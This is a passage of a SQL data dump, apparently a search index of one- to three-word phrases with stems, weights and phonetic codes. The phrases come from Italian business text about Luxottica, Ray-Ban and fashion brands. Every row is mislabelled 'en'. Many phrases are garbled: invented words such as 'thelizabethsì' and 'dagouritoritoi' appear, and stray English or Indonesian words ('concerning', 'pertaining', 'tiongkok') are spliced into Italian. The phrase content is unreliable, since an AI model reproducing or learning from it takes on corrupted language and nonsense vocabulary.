di',0,1,1.8667,'A42531621253',1,'en'),(29725,'all of us','all of us',0,1,1.3,'A412',1,'en'),(29726,'all\'','all',0,0,0.2667,'A400',1,'en'),(29727,'all\' avanguardia','all avanguardia',0,1,1.5333,'A415263',1,'en'),(29728,'all\' avanguardia già','all avanguardia già',0,1,1.6667,'A4152632',1,'en'),(29729,'all\' innovazione','all innovazione',0,1,1.5333,'A45125',1,'en'),(29730,'all\' innovazione dei','all innovazione dei',0,1,1.6667,'A451253',1,'en'),(29731,'alla capacità','alla capacità',0,1,1.4333,'A42123',1,'en'),(29732,'alla capacità già','alla capacità già',0,1,1.5667,'A421232',1,'en'),(29733,'alla possibilità','alla possibilità',0,1,1.5333,'A412143',1,'en'),(29734,'alla possibilità gna','alla possibilità gna',0,1,1.6667,'A41214325',1,'en'),(29735,'alla propria','alla propria',0,1,1.4,'A41616',1,'en'),(29736,'alla propria organizzazione','alla propria organizzazione',0,1,1.9,'A416162525',1,'en'),(29737,'allo','allo',0,0,0.2667,'A400',1,'en'),(29738,'allo sport','allo sport',0,1,1.3333,'A42163',1,'en'),(29739,'allo sport è','allo sport è',0,1,1.4,'A42163',1,'en'),(29740,'altra','altra',0,0,0.3333,'A436',1,'en'),(29741,'altra sfida','altra sfida',0,1,1.3667,'A436213',1,'en'),(29742,'altra sfida è','altra sfida è',0,1,1.4333,'A436213',1,'en'),(29743,'altrat','altrat',0,0,0.4,'A4363',1,'en'),(29744,'altrat thelizabethsì','altrat thelizabethsì',0,1,1.6667,'A436342132',1,'en'),(29745,'altrat thelizabethsì vivitamin','altrat thelizabethsì vivitamin',0,1,2,'A436342132135',1,'en'),(29746,'altre','altr',0,0,0.3333,'A436',1,'en'),(29747,'altre piccole','altr piccole',0,1,1.4333,'A436124',1,'en'),(29748,'altre piccole e','altr piccole e',0,1,1.5,'A436124',1,'en'),(29749,'altri accessori','altri accessori',0,1,1.5,'A43626',1,'en'),(29750,'altri accessori firmati','altri accessori firmati',0,1,1.7667,'A436261653',1,'en'),(29751,'altri ne','altri ne',0,1,1.2667,'A4365',1,'en'),(29752,'altri ne faremo','altri ne faremo',0,1,1.5,'A4365165',1,'en'),(29753,'altro','altro',0,0,0.3333,'A436',1,'en'),(29754,'altro satgno','altro satgno',0,1,1.4,'A4362325',1,'en'),(29755,'altro satgno distintivo','altro satgno distintivo',0,1,1.7667,'A4362325323531',1,'en'),(29756,'americani','americani',0,0,0.6,'A5625',1,'en'),(29757,'americani degli','americani degli',0,1,1.5,'A5625324',1,'en'),(29758,'americani degli asiatici','americani degli asiatici',0,1,1.8,'A5625324232',1,'en'),(29759,'amministratore','amministrator',0,0,0.9333,'A523636',1,'en'),(29760,'amministratore delegato','amministrator delegato',0,1,1.7667,'A5236363423',1,'en'),(29761,'amministratore delegato del','amministrator delegato del',0,1,1.9,'A52363634234',1,'en'),(29762,'anche della','anch della',0,1,1.3667,'A5234',1,'en'),(29763,'anche della teatralità','anch della teatralità',0,1,1.7333,'A52343643',1,'en'),(29764,'anche nell\'','anch nell',0,1,1.3667,'A5254',1,'en'),(29765,'anche nell\' organizzazione','anch nell organizzazione',0,1,1.8667,'A525462525',1,'en'),(29766,'anche parziale','anch parziale',0,1,1.4667,'A521624',1,'en'),(29767,'anche parziale scam','anch parziale scam',0,1,1.6333,'A52162425',1,'en'),(29768,'anche se','anch se',0,1,1.2667,'A520',1,'en'),(29769,'anche se for','anch se for',0,1,1.4,'A5216',1,'en'),(29770,'anche tra','anch tra',0,1,1.3,'A5236',1,'en'),(29771,'anche tra dieci','anch tra dieci',0,1,1.5,'A523632',1,'en'),(29772,'anche una','anch una',0,1,1.3,'A525',1,'en'),(29773,'anche una capacità','anch una capacità',0,1,1.6,'A5252123',1,'en'),(29774,'ancora','ancora',0,0,0.4,'A526',1,'en'),(29775,'ancora grandissimi','ancora grandissimi',0,1,1.6,'A526265325',1,'en'),(29776,'ancora grandissimi spazi','ancora grandissimi spazi',0,1,1.8,'A526265325212',1,'en'),(29777,'and every gli','and every gli',0,1,1.4333,'A531624',1,'en'),(29778,'and providing','and providing',0,1,1.4333,'A53161352',2,'en'),(29779,'and providing ogni','and providing ogni',0,1,1.6,'A531613525',1,'en'),(29780,'andarci','andarci',0,0,0.4667,'A5362',1,'en'),(29781,'andarci da','andarci da',0,1,1.3333,'A53623',1,'en'),(29782,'andarci da soli','andarci da soli',0,1,1.5,'A5362324',1,'en'),(29783,'andare','andar',0,0,0.4,'A536',1,'en'),(29784,'andare in','andar in',0,1,1.3,'A5365',1,'en'),(29785,'andare in cina','andar in cina',0,1,1.4667,'A536525',1,'en'),(29786,'andata','andata',0,0,0.4,'A530',1,'en'),(29787,'andata meglio','andata meglio',0,1,1.4333,'A53524',1,'en'),(29788,'andata meglio sui','andata meglio sui',0,1,1.5667,'A535242',1,'en'),(29789,'andrea','andrea',0,0,0.4,'A536',1,'en'),(29790,'andrea guerra','andrea guerra',0,1,1.4333,'A53626',1,'en'),(29791,'andrea guerra da','andrea guerra da',0,1,1.5333,'A536263',1,'en'),(29792,'angeles barriera','angel barriera',0,1,1.5333,'A524216',1,'en'),(29793,'angeles barriera dei','angel barriera dei',0,1,1.6667,'A5242163',1,'en'),(29794,'angeles moda','angel moda',0,1,1.4,'A524253',1,'en'),(29795,'angeles moda e','angel moda e',0,1,1.4667,'A524253',1,'en'),(29796,'angeles turchia','angel turchia',0,1,1.5,'A5242362',1,'en'),(29797,'angeles turchia ha','angel turchia ha',0,1,1.6,'A5242362',1,'en'),(29798,'anni abbiamo','anni abbiamo',0,1,1.4,'A515',1,'en'),(29799,'anni abbiamo potuto','anni abbiamo potuto',0,1,1.6333,'A51513',1,'en'),(29800,'anni amministratore','anni amministratore',0,1,1.6333,'A523636',1,'en'),(29801,'anni amministratore delegato','anni amministratore delegato',0,1,1.9333,'A5236363423',1,'en'),(29802,'anni concerning','anni concerning',0,1,1.5,'A5252652',1,'en'),(29803,'anni concerning questo','anni concerning questo',0,1,1.7333,'A52526523',1,'en'),(29804,'anni fa','anni fa',0,1,1.2333,'A510',1,'en'),(29805,'anni fa erano','anni fa erano',0,1,1.4333,'A5165',1,'en'),(29806,'anni fa questa','anni fa questa',0,1,1.4667,'A5123',1,'en'),(29807,'anni il','anni il',0,1,1.2333,'A540',1,'en'),(29808,'anni il suo','anni il suo',0,1,1.3667,'A542',1,'en'),(29809,'anno di','anno di',0,1,1.2333,'A530',1,'en'),(29810,'anno di licenza','anno di licenza',0,1,1.5,'A534252',1,'en'),(29811,'anno è','anno è',0,1,1.2,'A500',1,'en'),(29812,'anno è difficile','anno è difficile',0,1,1.5333,'A53124',1,'en'),(29813,'anno luxottica','anno luxottica',0,1,1.4667,'A54232',1,'en'),(29814,'anno luxottica los','anno luxottica los',0,1,1.6,'A5423242',1,'en'),(29815,'anno nii','anno nii',0,1,1.2667,'A500',1,'en'),(29816,'anno nii nostri','anno nii nostri',0,1,1.5,'A5236',1,'en'),(29817,'anno scorso','anno scorso',0,1,1.3667,'A5262',1,'en'),(29818,'anno scorso quasi','anno scorso quasi',0,1,1.5667,'A5262',1,'en'),(29819,'anno supererà','anno supererà',0,1,1.4333,'A5216',1,'en'),(29820,'anno supererà quest\'','anno supererà quest',0,1,1.6667,'A521623',1,'en'),(29821,'archivi','archivi',0,0,0.4667,'A621',1,'en'),(29822,'archivi spetta','archivi spetta',0,1,1.4667,'A621213',1,'en'),(29823,'archivi spetta in','archivi spetta in',0,1,1.5667,'A6212135',1,'en'),(29824,'are generally sezione','ar generally sezione',0,1,1.7,'A6256425',1,'en'),(29825,'are generally taglia','ar generally taglia',0,1,1.6667,'A62564324',1,'en'),(29826,'as profondità','as profondità',0,1,1.4333,'A216153',1,'en'),(29827,'as profondità dobbas','as profondità dobbas',0,1,1.6667,'A21615312',1,'en'),(29828,'asia','asia',0,0,0.2667,'A200',1,'en'),(29829,'asia di','asia di',0,1,1.2333,'A230',1,'en'),(29830,'asia di service','asia di service',0,1,1.5,'A232612',1,'en'),(29831,'asiatici','asiatici',0,0,0.5333,'A232',1,'en'),(29832,'asiatici e','asiatici e',0,1,1.3333,'A232',1,'en'),(29833,'asiatici e che','asiatici e che',0,1,1.4667,'A232',1,'en'),(29834,'assolutamente','assolutament',0,0,0.8667,'A24353',1,'en'),(29835,'assolutamente n\',','assolutament n',0,1,1.5667,'A243535',1,'en'),(29836,'assolutamente n\', not','assolutament n not',0,1,1.7,'A2435353',1,'en'),(29837,'assoluto','assoluto',0,0,0.5333,'A243',1,'en'),(29838,'assoluto grande','assoluto grande',0,1,1.5,'A2432653',1,'en'),(29839,'assoluto grande for','assoluto grande for',0,1,1.6333,'A243265316',1,'en'),(29840,'at o','at o',0,1,1.1333,'A300',1,'en'),(29841,'at o di','at o di',0,1,1.2333,'A300',1,'en'),(29842,'at thelizabeth qualità','at thelizabeth qualità',0,1,1.7333,'A34213243',1,'en'),(29843,'at thelizabeth riproduzionagouritorito','at thelizabeth riproduzionagouritorito',0,1,2,'A3421361632526363',1,'en'),(29844,'attenti','attenti',0,0,0.4667,'A353',1,'en'),(29845,'attenti con','attenti con',0,1,1.3667,'A35325',1,'en'),(29846,'attenti con i','attenti con i',0,1,1.4333,'A35325',1,'en'),(29847,'attesi','attesi',0,0,0.4,'A320',1,'en'),(29848,'attesi 120','attesi 120',0,1,1.3333,'A320',1,'en'),(29849,'attesi 120 milioni','attesi 120 milioni',0,1,1.6,'A32545',1,'en'),(29850,'attrarre','attrarr',0,0,0.5333,'A360',1,'en'),(29851,'attrarre il','attrarr il',0,1,1.3667,'A364',1,'en'),(29852,'attrarre il nostro','attrarr il nostro',0,1,1.6,'A3645236',1,'en'),(29853,'attraverso','attraverso',0,0,0.6667,'A36162',1,'en'),(29854,'attraverso are','attraverso are',0,1,1.4667,'A361626',1,'en'),(29855,'attraverso are generally','attraverso are generally',0,1,1.8,'A3616262564',1,'en'),(29856,'attraverso questo','attraverso questo',0,1,1.5667,'A361623',1,'en'),(29857,'attraverso questo servizio','attraverso questo servizio',0,1,1.8667,'A3616232612',1,'en'),(29858,'avanguardia','avanguardia',0,0,0.7333,'A15263',1,'en'),(29859,'avanguardia già','avanguardia già',0,1,1.5,'A152632',1,'en'),(29860,'avanguardia già nel','avanguardia già nel',0,1,1.6333,'A15263254',1,'en'),(29861,'aver','aver',0,0,0.2667,'A160',1,'en'),(29862,'aver fatto','aver fatto',0,1,1.3333,'A1613',1,'en'),(29863,'aver fatto pertaining','aver fatto pertaining',0,1,1.7,'A161316352',1,'en'),(29864,'avere','aver',0,0,0.3333,'A160',1,'en'),(29865,'avere altri','aver altri',0,1,1.3667,'A16436',1,'en'),(29866,'avere altri accessori','aver altri accessori',0,1,1.7,'A1643626',1,'en'),(29867,'avere il','aver il',0,1,1.2667,'A164',1,'en'),(29868,'avere il meglio','aver il meglio',0,1,1.5,'A164524',1,'en'),(29869,'avere un','aver un',0,1,1.2667,'A165',1,'en'),(29870,'avere un portafoglio','aver un portafoglio',0,1,1.6667,'A165163124',1,'en'),(29871,'averli','averli',0,0,0.4,'A164',1,'en'),(29872,'averli in','averli in',0,1,1.3,'A1645',1,'en'),(29873,'averli in testa','averli in testa',0,1,1.5,'A1645323',1,'en'),(29874,'averlo','averlo',0,0,0.4,'A164',1,'en'),(29875,'averlo in','averlo in',0,1,1.3,'A1645',1,'en'),(29876,'averlo in mente','averlo in mente',0,1,1.5,'A16453',1,'en'),(29877,'avremo','avremo',0,0,0.4,'A165',1,'en'),(29878,'avremo a','avremo a',0,1,1.2667,'A165',1,'en'),(29879,'avremo a marzo','avremo a marzo',0,1,1.4667,'A16562',1,'en'),(29880,'aziende','aziend',0,0,0.4667,'A253',1,'en'),(29881,'aziende medio','aziend medio',0,1,1.4333,'A25353',1,'en'),(29882,'aziende medio piccole','aziend medio piccole',0,1,1.7,'A25353124',1,'en'),(29883,'ban of','ban of',0,1,1.2,'B510',1,'en'),(29884,'ban of india','ban of india',0,1,1.4,'B5153',1,'en'),(29885,'barriera','barriera',0,0,0.5333,'B600',1,'en'),(29886,'barriera dei','barriera dei',0,1,1.4,'B630',1,'en'),(29887,'barriera dei 5','barriera dei 5',0,1,1.4667,'B630',1,'en'),(29888,'be un','be un',0,1,1.1667,'B500',1,'en'),(29889,'be un paradiso','be un paradiso',0,1,1.4667,'B51632',1,'en'),(29890,'believe facendo','believ facendo',0,1,1.5,'B41253',1,'en'),(29891,'believe facendo il','believ facendo il',0,1,1.6,'B412534',1,'en'),(29892,'bene','bene',0,0,0.2667,'B500',1,'en'),(29893,'bene il','bene il',0,1,1.2333,'B540',1,'en'),(29894,'bene il portafoglio','bene il portafoglio',0,1,1.6333,'B54163124',1,'en'),(29895,'bene un','bene un',0,1,1.2333,'B500',1,'en'),(29896,'bene un distrarsi','bene un distrarsi',0,1,1.5667,'B532362',1,'en'),(29897,'biennio','biennio',0,0,0.4667,'B500',1,'en'),(29898,'biennio passato','biennio passato',0,1,1.5,'B5123',1,'en'),(29899,'biennio passato abbiamo','biennio passato abbiamo',0,1,1.7667,'B512315',1,'en'),(29900,'brasiliano','brasiliano',0,0,0.6667,'B6245',1,'en'),(29901,'brasiliano o','brasiliano o',0,1,1.4,'B6245',1,'en'),(29902,'brasiliano o indiano','brasiliano o indiano',0,1,1.6667,'B624535',1,'en'),(29903,'breve','breve',0,0,0.3333,'B610',1,'en'),(29904,'breve termine','breve termine',0,1,1.4333,'B61365',1,'en'),(29905,'breve termine su','breve termine su',0,1,1.5333,'B613652',1,'en'),(29906,'buona','buona',0,0,0.3333,'B500',1,'en'),(29907,'buona crescita','buona crescita',0,1,1.4667,'B52623',1,'en'),(29908,'buona crescita disadvantage','buona crescita disadvantage',0,1,1.9,'B52623231532',1,'en'),(29909,'burberry','burberri',0,0,0.5333,'B616',1,'en'),(29910,'burberry e','burberri e',0,1,1.3333,'B616',1,'en'),(29911,'burberry e da','burberri e da',0,1,1.4333,'B6163',1,'en'),(29912,'business pages 2','busi pages 2',0,1,1.5333,'B25212',1,'en'),(29913,'by yourself','by yourself',0,1,1.3667,'B6241',2,'en'),(29914,'by yourself nel','by yourself nel',0,1,1.5,'B624154',1,'en'),(29915,'byblos','byblo',0,0,0.4,'B420',1,'en'),(29916,'byblos moschino','byblo moschino',0,1,1.5,'B42525',1,'en'),(29917,'byblos moschino u','byblo moschino u',0,1,1.5667,'B42525',1,'en'),(29918,'c\'','c',0,0,0.1333,'C000',1,'en'),(29919,'c\' è','c è',0,1,1.1333,'C000',1,'en'),(29920,'c\' è chi','c è chi',0,1,1.2667,'C000',1,'en'),(29921,'cambiando','cambiando',0,0,0.6,'C5153',1,'en'),(29922,'cambiando e','cambiando e',0,1,1.3667,'C5153',1,'en'),(29923,'cambiando e non','cambiando e non',0,1,1.5,'C51535',1,'en'),(29924,'cambio','cambio',0,0,0.4,'C510',1,'en'),(29925,'cambio influisce','cambio influisce',0,1,1.5333,'C515142',1,'en'),(29926,'cambio influisce molto','cambio influisce molto',0,1,1.7333,'C515142543',1,'en'),(29927,'capacità','capacità',0,0,0.5333,'C123',1,'en'),(29928,'capacità di','capacità di',0,1,1.3667,'C123',1,'en'),(29929,'capacità di crescita','capacità di crescita',0,1,1.6667,'C1232623',1,'en'),(29930,'capacità già','capacità già',0,1,1.4,'C1232',1,'en'),(29931,'capacità già dimostrata','capacità già dimostrata',0,1,1.7667,'C1232352363',1,'en'),(29932,'cat','cat',0,0,0.2,'C300',1,'en'),(29933,'cat thelizabethntrali','cat thelizabethntrali',0,1,1.7,'C342135364',1,'en'),(29934,'cat thelizabethntrali mother','cat thelizabethntrali mother',0,1,1.9333,'C342135364536',1,'en'),(29935,'cautela','cautela',0,0,0.4667,'C340',1,'en'),(29936,'cautela andrea','cautela andrea',0,1,1.4667,'C34536',1,'en'),(29937,'cautela andrea guerra','cautela andrea guerra',0,1,1.7,'C3453626',1,'en'),(29938,'censilidati','censilidati',0,0,0.7333,'C5243',1,'en'),(29939,'censilidati entrambi','censilidati entrambi',0,1,1.6667,'C524353651',1,'en'),(29940,'censilidati entrambi ha','censilidati entrambi ha',0,1,1.7667,'C524353651',1,'en'),(29941,'certa','certa',0,0,0.3333,'C630',1,'en'),(29942,'certa cautela','certa cautela',0,1,1.4333,'C63234',1,'en'),(29943,'certa cautela andrea','certa cautela andrea',0,1,1.6667,'C63234536',1,'en'),(29944,'che believe','che believe',0,1,1.3667,'C141',1,'en'),(29945,'che believe facendo','che believe facendo',0,1,1.6333,'C141253',1,'en'),(29946,'che è','che è',0,1,1.1667,'C000',1,'en'),(29947,'che è bene','che è bene',0,1,1.3333,'C150',1,'en'),(29948,'che fa','che fa',0,1,1.2,'C100',2,'en'),(29949,'che fa scaturire','che fa scaturire',0,1,1.5333,'C1236',1,'en'),(29950,'che la','che la',0,1,1.2,'C400',1,'en'),(29951,'che la tiongkok','che la tiongkok',0,1,1.5,'C4352',1,'en'),(29952,'che nel','che nel',0,1,1.2333,'C540',1,'en'),(29953,'che nel 2006','che nel 2006',0,1,1.4,'C540',1,'en'),(29954,'che per','che per',0,1,1.2333,'C160',1,'en'),(29955,'che per loro','che per loro',0,1,1.4,'C1646',1,'en'),(29956,'che sappiano','che sappiano',0,1,1.4,'C150',1,'en'),(29957,'che sappiano dare','che sappiano dare',0,1,1.5667,'C1536',1,'en'),(29958,'che sappiano lavorare','che sappiano lavorare',0,1,1.7,'C15416',1,'en'),(29959,'chi dalla','chi dalla',0,1,1.3,'C340',1,'en'),(29960,'chi dalla tiongkok','chi dalla tiongkok',0,1,1.6,'C34352',1,'en'),(29961,'chi è','chi è',0,1,1.1667,'C000',1,'en'),(29962,'chi è piccolo','chi è piccolo',0,1,1.4333,'C124',1,'en'),(29963,'chi intendesse','chi intendesse',0,1,1.4667,'C53532',1,'en'),(29964,'chi intendesse utilizzare','chi intendesse utilizzare',0,1,1.8333,'C535323426',1,'en'),(29965,'chi sta','chi sta',0,1,1.2333,'C300',1,'en'),(29966,'chi sta in','chi sta in',0,1,1.3333,'C350',1,'en'),(29967,'chicago','chicago',0,0,0.4667,'C000',1,'en'),(29968,'chicago polonia','chicago polonia',0,1,1.5,'C145',1,'en'),(29969,'chicago polonia o','chicago polonia o',0,1,1.5667,'C145',1,'en'),(29970,'chicago realtà','chicago realtà',0,1,1.4667,'C643',1,'en'),(29971,'chicago realtà italiana','chicago realtà italiana',0,1,1.7667,'C64345',1,'en'),(29972,'chief mondiale','chief mondiale',0,1,1.4667,'C1534',1,'en'),(29973,'chief mondiale dell\'','chief mondiale dell',0,1,1.6667,'C153434',1,'en'),(29974,'ci','ci',0,0,0.1333,'C000',2,'en'),(29975,'ci permette','ci permette',0,1,1.3667,'C1653',1,'en'),(29976,'ci permette di','ci permette di',0,1,1.4667,'C1653',1,'en'),(29977,'ci sono','ci sono',0,1,1.2333,'C500',2,'en'),(29978,'ci sono ancora','ci sono ancora',0,1,1.4667,'C526',1,'en'),(29979,'ciclo','ciclo',0,0,0.3333,'C400',1,'en'),(29980,'ciclo economico','ciclo economico',0,1,1.5,'C4252',1,'en'),(29981,'ciclo economico grazie','ciclo economico grazie',0,1,1.7333,'C425262',1,'en'),(29982,'cina','cina',0,0,0.2667,'C500',1,'en'),(29983,'cina con','cina con',0,1,1.2667,'C525',1,'en'),(29984,'cina con serenità','cina con serenità',0,1,1.5667,'C5252653',1,'en'),(29985,'cina è','cina è',0,1,1.2,'C500',1,'en'),(29986,'cina è stata','cina è stata',0,1,1.4,'C523',1,'en'),(29987,'cina quell\'','cina quell',0,1,1.3667,'C524',1,'en'),(29988,'cina quell\' iniziativa','cina quell iniziativa',0,1,1.7333,'C5245231',1,'en'),(29989,'cinese','cines',0,0,0.4,'C520',1,'en'),(29990,'cinese nope','cines nope',0,1,1.3667,'C5251',1,'en'),(29991,'cinese nope credo','cines nope credo',0,1,1.5667,'C5251263',1,'en'),(29992,'cinque','cinqu',0,0,0.4,'C520',1,'en'),(29993,'cinque anni','cinqu anni',0,1,1.3667,'C525',1,'en'),(29994,'cinque anni fa','cinqu anni fa',0,1,1.4667,'C5251',1,'en'),(29995,'complessivamente','complessivament',0,0,1,'C5142153',1,'en'),(29996,'complessivamente 2.500','complessivament 2.500',0,1,1.7333,'C5142153',1,'en'),(29997,'complessivamente 2.500 persone','complessivament 2.500 persone',0,1,2,'C51421531625',1,'en'),(29998,'comprare','comprar',0,0,0.5333,'C516',1,'en'),(29999,'comprare qualche','comprar qualche',0,1,1.5333,'C516242',1,'en'),(30000,'comprare qualche società','comprar qualche società',0,1,1.8,'C5162423',1,'en'),(30001,'comunque','comunqu',0,0,0.5333,'C520',1,'en'),(30002,'comunque the','comunqu the',0,1,1.4,'C523',1,'en'),(30003,'comunque the avremo','comunqu the avremo',0,1,1.6333,'C523165',1,'en'),(30004,'con dolce','con dolce',0,1,1.3,'C5342',1,'en'),(30005,'con dolce gabbana','con dolce gabbana',0,1,1.5667,'C534215',1,'en'),(30006,'con i','con i',0,1,1.1667,'C500',1,'en'),(30007,'con i fornitori','con i fornitori',0,1,1.5,'C516536',1,'en'),(30008,'con i messaggi','con i messaggi',0,1,1.4667,'C520',1,'en'),(30009,'con risorse','con risorse',0,1,1.3667,'C56262',1,'en'),(30010,'con risorse giovani','con risorse giovani',0,1,1.6333,'C5626215',1,'en'),(30011,'con serenità','con serenità',0,1,1.4,'C52653',1,'en'),(30012,'con serenità o','con serenità o',0,1,1.4667,'C52653',1,'en'),(30013,'concerning questo','concern questo',0,1,1.5667,'C526523',1,'en'),(30014,'concerning questo dobbiamo','concern questo dobbiamo',0,1,1.8667,'C52652315',1,'en'),(30015,'congiuntura','congiuntura',0,0,0.7333,'C52536',1,'en'),(30016,'congiuntura pertaining','congiuntura pertaining',0,1,1.7333,'C5253616352',1,'en'),(30017,'congiuntura pertaining to','congiuntura pertaining to',0,1,1.8333,'C52536163523',1,'en'),(30018,'conosciamo','conosciamo',0,0,0.6667,'C525',1,'en'),(30019,'conosciamo che','conosciamo che',0,1,1.4667,'C5252',1,'en'),(30020,'conosciamo che è','conosciamo che è',0,1,1.5333,'C5252',1,'en'),(30021,'considerata','considerata',0,0,0.7333,'C52363',1,'en'),(30022,'considerata chicago','considerata chicago',0,1,1.6333,'C523632',1,'en'),(30023,'considerata chicago realtà','considerata chicago realtà',0,1,1.8667,'C523632643',1,'en'),(30024,'consumatore','consumator',0,0,0.7333,'C52536',1,'en'),(30025,'consumatore visto','consumator visto',0,1,1.5667,'C52536123',1,'en'),(30026,'consumatore visto il','consumator visto il',0,1,1.6667,'C525361234',1,'en'),(30027,'consuntivo','consuntivo',0,0,0.6667,'C52531',1,'en'),(30028,'consuntivo delete','consuntivo delete',0,1,1.5667,'C52531343',1,'en'),(30029,'consuntivo delete primo','consuntivo delete primo',0,1,1.7667,'C52531343165',1,'en'),(30030,'continuare','continuar',0,0,0.6667,'C5356',1,'en'),(30031,'continuare a','continuar a',0,1,1.4,'C5356',1,'en'),(30032,'continuare a ticket','continuar a ticket',0,1,1.6333,'C5356323',1,'en'),(30033,'controllata','controllata',0,0,0.7333,'C53643',1,'en'),(30034,'controllata ray','controllata ray',0,1,1.5,'C536436',1,'en'),(30035,'controllata ray ban','controllata ray ban',0,1,1.6333,'C53643615',1,'en'),(30036,'cosa','cosa',0,0,0.2667,'C000',1,'en'),(30037,'cosa da','cosa da',0,1,1.2333,'C300',1,'en'),(30038,'cosa da sottolineare','cosa da sottolineare',0,1,1.6667,'C323456',1,'en'),(30039,'cosa gna','cosa gna',0,1,1.2667,'C500',1,'en'),(30040,'cosa gna è','cosa gna è',0,1,1.3333,'C500',1,'en'),(30041,'cosa positiva','cosa positiva',0,1,1.4333,'C1231',1,'en'),(30042,'cosa positiva di','cosa positiva di',0,1,1.5333,'C12313',1,'en'),(30043,'cost errori','cost errori',0,1,1.3667,'C360',1,'en'),(30044,'cost errori considerata','cost errori considerata',0,1,1.7667,'C36252363',1,'en'),(30045,'cost nuove','cost nuove',0,1,1.3333,'C351',1,'en'),(30046,'cost nuove acquisizioni','cost nuove acquisizioni',0,1,1.7667,'C35125',1,'en'),(30047,'credo','credo',0,0,0.3333,'C630',1,'en'),(30048,'credo di','credo di',0,1,1.2667,'C630',1,'en'),(30049,'credo di più','credo di più',0,1,1.4,'C631',1,'en'),(30050,'crescita','crescita',0,0,0.5333,'C623',1,'en'),(30051,'crescita disadvantage','crescita disadvantage',0,1,1.7,'C623231532',1,'en'),(30052,'crescita disadvantage il','crescita disadvantage il',0,1,1.8,'C6232315324',1,'en'),(30053,'crescita organica','crescita organica',0,1,1.5667,'C6236252',1,'en'),(30054,'crescita organica facendo','crescita organica facendo',0,1,1.8333,'C62362521253',1,'en'),(30055,'crescita prima','crescita prima',0,1,1.4667,'C623165',1,'en'),(30056,'crescita prima di','crescita prima di',0,1,1.5667,'C6231653',1,'en'),(30057,'crescita superiore','crescita superiore',0,1,1.6,'C623216',1,'en'),(30058,'crescita superiore \'s','crescita superiore s',0,1,1.7,'C6232162',1,'en'),(30059,'cresciuta','cresciuta',0,0,0.6,'C623',1,'en'),(30060,'cresciuta in','cresciuta in',0,1,1.4,'C6235',1,'en'),(30061,'cresciuta in sette','cresciuta in sette',0,1,1.6,'C623523',1,'en'),(30062,'cresciuti','cresciuti',0,0,0.6,'C623',1,'en'),(30063,'cresciuti delete','cresciuti delete',0,1,1.5333,'C62343',1,'en'),(30064,'cresciuti delete 13','cresciuti delete 13',0,1,1.6333,'C62343',1,'en'),(30065,'cui','cui',0,0,0.2,'C000',2,'en'),(30066,'cui guardare','cui guardare',0,1,1.4,'C636',1,'en'),(30067,'cui guardare paesi','cui guardare paesi',0,1,1.6,'C63612',1,'en'),(30068,'culture ed','cultur ed',0,1,1.3333,'C4363',1,'en'),(30069,'culture ed età','cultur ed età',0,1,1.4667,'C4363',1,'en'),(30070,'curare','curar',0,0,0.4,'C600',1,'en'),(30071,'curare chi','curar chi',0,1,1.3333,'C620',1,'en'),(30072,'curare chi sta','curar chi sta',0,1,1.4667,'C623',1,'en'),(30073,'d\'','d',0,0,0.1333,'D000',1,'en'),(30074,'d\' affari','d affari',0,1,1.3,'D160',1,'en'),(30075,'d\' affari delete','d affari delete',0,1,1.5333,'D16343',1,'en'),(30076,'da leonardo','da leonardo',0,1,1.3667,'D4563',1,'en'),(30077,'da leonardo del','da leonardo del',0,1,1.5,'D45634',1,'en'),(30078,'da poco','da poco',0,1,1.2333,'D120',1,'en'),(30079,'da poco abbiamo','da poco abbiamo',0,1,1.5,'D1215',1,'en'),(30080,'da qualche','da qualche',0,1,1.3333,'D242',1,'en'),(30081,'da qualche speed','da qualche speed',0,1,1.5333,'D24213',1,'en'),(30082,'da rcs','da rcs',0,1,1.2,'D620',1,'en'),(30083,'da rcs attraverso','da rcs attraverso',0,1,1.5667,'D6236162',1,'en'),(30084,'da sole','da sole',0,1,1.2333,'D240',1,'en'),(30085,'da sole hanno','da sole hanno',0,1,1.4333,'D245',1,'en'),(30086,'da soli','da soli',0,1,1.2333,'D240',1,'en'),(30087,'da soli e','da soli e',0,1,1.3,'D240',1,'en'),(30088,'da sottolineare','da sottolineare',0,1,1.5,'D23456',1,'en'),(30089,'da sottolineare è','da sottolineare è',0,1,1.5667,'D23456',1,'en'),(30090,'da tre anni','da tre anni',0,1,1.3667,'D650',1,'en'),(30091,'dagouritoritoi','dagouritoritoi',0,0,0.9333,'D26363',1,'en'),(30092,'dagouritoritoi marchi','dagouritoritoi marchi',0,1,1.7,'D26363562',1,'en'),(30093,'dagouritoritoi marchi at','dagouritoritoi marchi at',0,1,1.8,'D263635623',1,'en'),(30094,'dal ciclo','dal ciclo',0,1,1.3,'D424',1,'en'),(30095,'dal ciclo economico','dal ciclo economico',0,1,1.6333,'D424252',1,'en'),(30096,'dal vostro','dal vostro',0,1,1.3333,'D41236',1,'en'),(30097,'dal vostro portafoglio','dal vostro portafoglio',0,1,1.7333,'D41236163124',1,'en'),(30098,'dalla','dalla',0,0,0.3333,'D400',1,'en'),(30099,'dalla tiongkok','dalla tiongkok',0,1,1.4667,'D4352',1,'en'),(30100,'dalla tiongkok ritorna','dalla tiongkok ritorna',0,1,1.7333,'D43526365',1,'en'),(30101,'dare','dare',0,0,0.2667,'D600',1,'en'),(30102,'dare un','dare un',0,1,1.2333,'D650',1,'en'),(30103,'dare un valore','dare un valore',0,1,1.4667,'D65146',1,'en'),(30104,'dati','dati',0,0,0.2667,'D000',1,'en'),(30105,'dati reperibili','dati reperibili',0,1,1.5,'D61614',1,'en'),(30106,'dati reperibili attraverso','dati reperibili attraverso',0,1,1.8667,'D6161436162',1,'en'),(30107,'davvelectronicro','davvelectronicro',0,0,1,'D14236526',1,'en'),(30108,'davvelectronicro difficilat','davvelectronicro difficilat',0,1,1.9,'D1423652631243',1,'en'),(30109,'davvelectronicro difficilat lei','davvelectronicro difficilat lei',0,1,2,'D14236526312434',1,'en'),(30110,'dcontent','dcontent',0,0,0.5333,'D25353',1,'en'),(30111,'dcontent luxottnow','dcontent luxottnow',0,1,1.6,'D253534235',1,'en'),(30112,'dcontent luxottnow ourca','dcontent luxottnow ourca',0,1,1.8,'D25353423562',1,'en'),(30113,'debba','debba',0,0,0.3333,'D100',1,'en'),(30114,'debba seguire','debba seguire',0,1,1.4333,'D126',1,'en'),(30115,'debba seguire la','debba seguire la',0,1,1.5333,'D1264',1,'en'),(30116,'debolmyself','debolmyself',0,0,0.7333,'D145241',1,'en'),(30117,'debolmyself dcontent','debolmyself dcontent',0,1,1.6667,'D145241325353',1,'en'),(30118,'debolmyself dcontent luxottnow','debolmyself dcontent luxottnow',0,1,2,'D1452413253534235',1,'en'),(30119,'degli','degli',0,0,0.3333,'D240',1,'en'),(30120,'degli americani','degli 